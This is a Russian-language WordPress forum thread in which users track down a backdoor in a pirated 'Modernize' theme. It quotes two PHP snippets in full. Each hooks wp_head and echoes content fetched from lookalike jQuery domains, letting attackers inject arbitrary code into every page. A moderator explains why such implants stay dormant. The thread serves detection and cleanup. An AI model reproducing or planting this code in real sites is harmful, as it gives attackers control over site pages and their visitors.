для чего им это надо?
Ну, как минимум, попасть в топ новостей — массовый взлом сайтов :))) А если честно, то я не вникаю в их логику.
У меня таже проблеммма тема Modernize, где брал не помню. Тему могу скинуть…
тема Modernize, где брал не помню
Сто тыщ миллионов раз говорили — не берите Темы с помоек..
bogom, на пастебине (выше ссылка) участок кода, поищите его у себя в файлах Темы (может быть и зашифрован)
нашёл только: <?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
А вот вроде то: <?php if (!function_exists('insert_jquery_des')){function insert_jquery_des(){if (function_exists('curl_init')){$url = "http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_des');} ?>
Было найдено в modernize\include\plugin\post.php
при чём в теме которую я ставил с нуля, те вирус был изначально…
Тогда почему сайт примерно месяц проработал нормально?
wikicms, спасибо большое, сайт заработал :))
Модератор
Юрій
(@yube)
Тогда почему сайт примерно месяц проработал нормально?
Потому что это «управляемый вирус». Во-первых, злоумышленникам есть смысл выждать — обычно через две-три недели после старта сайта или серьезной переделки (той же смены темы) админы расслабляются и перестают разглядывать под микроскопом свой сайт, то есть, со временем вероятность обнаружения закладки сильно падает. Во-вторых, те, кто контролирует такие закладки, чаще всего работают за деньги, и пока нет заказа, закладка молча ждет своего часа.